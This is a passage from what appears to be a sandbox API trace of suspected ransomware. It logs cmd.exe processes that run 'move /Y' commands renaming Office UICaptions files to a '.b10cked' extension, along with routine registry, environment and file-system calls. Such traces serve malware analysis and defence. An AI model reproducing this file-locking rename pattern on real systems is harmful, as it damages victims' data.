lpData=0x28eb10*=0x40, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.561] RegCloseKey (hKey=0x40) returned 0x0 [0156.561] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eb04 | out: phkResult=0x28eb04*=0x40) returned 0x0 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0x40, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.561] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x1, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.562] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0x1, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.562] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x0, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.562] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x9, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.562] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x4, lpData=0x28eb10*=0x9, lpcbData=0x28eb08*=0x4) returned 0x0 [0156.562] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eb0c, lpData=0x28eb10, lpcbData=0x28eb08*=0x1000 | out: lpType=0x28eb0c*=0x0, lpData=0x28eb10*=0x9, lpcbData=0x28eb08*=0x1000) returned 0x2 [0156.562] 
RegCloseKey (hKey=0x40) returned 0x0 [0156.562] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637f [0156.562] srand (_Seed=0x5b88637f) [0156.562] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked\"" [0156.562] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked\"" [0156.562] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.562] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0156.562] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0156.562] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0156.562] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.562] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0156.562] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0156.562] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0156.562] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0156.563] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0156.563] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0156.563] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0156.563] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0156.563] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0156.563] GetEnvironmentStringsW () returned 0x302360* [0156.563] FreeEnvironmentStringsW (penv=0x302360) returned 1 [0156.563] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.563] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.563] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0156.563] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0156.563] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0156.563] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0156.563] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0156.563] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0156.563] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0156.563] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0156.563] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f8d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.563] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f8d0, lpFilePart=0x28f8cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f8cc*="Desktop") returned 0x18 [0156.563] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0156.563] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f64c | out: lpFindFileData=0x28f64c) returned 0x3009f0 [0156.563] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0156.564] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f64c | out: lpFindFileData=0x28f64c) returned 0x3009f0 [0156.564] 
FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0156.564] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f64c | out: lpFindFileData=0x28f64c) returned 0x3009f0 [0156.564] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0156.564] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0156.564] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0156.564] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0156.564] GetEnvironmentStringsW () returned 0x300210* [0156.564] FreeEnvironmentStringsW (penv=0x300210) returned 1 [0156.564] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.565] GetConsoleOutputCP () returned 0x1b5 [0156.565] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.565] GetUserDefaultLCID () returned 0x409 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fa10, cchData=128 | out: lpLCData="0") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fa10, cchData=128 | out: lpLCData="0") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fa10, cchData=128 | out: lpLCData="1") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0156.565] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0156.565] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0156.565] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0156.566] GetConsoleTitleW (in: lpConsoleTitle=0x2f0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0156.566] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0156.566] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0156.566] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0156.567] _wcsicmp (_String1="move", _String2=")") returned 68 [0156.567] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0156.567] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0156.567] _wcsicmp (_String1="IF", _String2="move") returned -4 [0156.567] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0156.567] _wcsicmp (_String1="REM", _String2="move") returned 5 [0156.567] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0156.570] GetConsoleTitleW (in: lpConsoleTitle=0x28f708, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.571] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0156.571] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0156.571] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0156.571] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0156.571] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0156.571] _wcsicmp (_String1="move", _String2="CD") returned 10 [0156.571] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0156.571] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0156.571] _wcsicmp (_String1="move", _String2="REN") returned -5 [0156.571] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0156.571] _wcsicmp (_String1="move", _String2="SET") returned -6 [0156.571] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0156.571] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0156.571] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0156.571] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0156.571] _wcsicmp (_String1="move", _String2="MD") returned 11 [0156.571] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0156.571] _wcsicmp (_String1="move", _String2="RD") returned -5 [0156.571] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0156.571] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0156.571] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0156.571] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0156.571] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0156.571] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0156.571] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0156.571] _wcsicmp (_String1="move", _String2="VER") returned -9 [0156.571] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0156.571] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0156.571] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0156.571] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0156.571] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0156.571] _wcsicmp (_String1="move", _String2="START") returned -6 [0156.571] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0156.571] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0156.571] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0156.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0156.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0156.573] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f4c4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f4bc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f4bc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.573] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0156.574] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0156.574] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0156.574] _wcsicmp (_String1="OUTLLI~1.TRX", _String2=".") returned 65 [0156.574] _wcsicmp 
(_String1="OUTLLI~1.TRX", _String2="..") returned 65 [0156.574] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlli~1.trx")) returned 0x2020 [0156.574] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.575] SetErrorMode (uMode=0x0) returned 0x0 [0156.575] SetErrorMode (uMode=0x1) returned 0x0 [0156.575] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", nBufferLength=0x104, lpBuffer=0x28ee4c, lpFilePart=0x28ee34 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", lpFilePart=0x28ee34*="OUTLLI~1.TRX") returned 0x3c [0156.575] SetErrorMode (uMode=0x0) returned 0x1 [0156.575] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0156.575] _wcsicmp (_String1="OUTLLI~1.TRX", _String2=".") returned 65 [0156.575] _wcsicmp (_String1="OUTLLI~1.TRX", _String2="..") returned 65 [0156.575] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlli~1.trx")) returned 0x2020 [0156.575] SetErrorMode (uMode=0x0) returned 0x0 [0156.575] SetErrorMode (uMode=0x1) returned 0x0 [0156.575] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", nBufferLength=0x104, lpBuffer=0x28f2c8, lpFilePart=0x28f060 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", lpFilePart=0x28f060*="OUTLLI~1.TRX") returned 0x3c [0156.575] SetErrorMode (uMode=0x0) returned 0x1 [0156.575] SetErrorMode (uMode=0x0) returned 0x0 [0156.575] SetErrorMode (uMode=0x1) returned 0x0 [0156.575] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28f4d0, lpFilePart=0x28f060 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked", lpFilePart=0x28f060*="OUTLLIBR.DLL.trx_dll.b10cked") returned 0x4c [0156.575] SetErrorMode (uMode=0x0) returned 0x1 [0156.575] SetLastError (dwErrCode=0x0) [0156.575] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.dll.trx_dll.b10cked")) returned 0xffffffff [0156.575] GetLastError () returned 0x2 [0156.575] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x28e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e9dc) returned 0x302130 [0156.576] FindNextFileW (in: hFindFile=0x302130, lpFindFileData=0x28e9dc | out: lpFindFileData=0x28e9dc) returned 0 [0156.576] GetLastError () returned 0x12 [0156.576] FindClose (in: hFindFile=0x302130 | out: hFindFile=0x302130) returned 1 [0156.577] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x301cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301cc0) returned 0x302130 [0156.577] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28ec74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0156.577] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x28ec74, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0156.577] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.dll.trx_dll")) returned 0x2020 [0156.578] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outllibr.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0156.578] FindClose (in: hFindFile=0x302130 | out: hFindFile=0x302130) returned 1 [0156.578] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28ec28 | out: _Buffer=" 1") returned 9 [0156.578] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.578] GetFileType (hFile=0x7) returned 0x2 [0156.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0156.578] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28ebb4 | out: lpMode=0x28ebb4) returned 1 [0156.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.579] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28ebe8 | out: lpConsoleScreenBufferInfo=0x28ebe8) returned 1 [0156.579] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0156.579] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28ec28 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0156.579] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x28ec0c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28ec0c*=0x1a) returned 1 [0156.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.579] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0156.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.579] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0156.580] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.580] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0156.580] SetConsoleInputExeNameW () returned 0x1 [0156.580] GetConsoleOutputCP () returned 0x1b5 [0156.580] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.580] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.580] exit (_Code=0) Process: id = "261" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21615 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21616 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21617 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21618 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 21619 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21620 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21621 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21622 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" 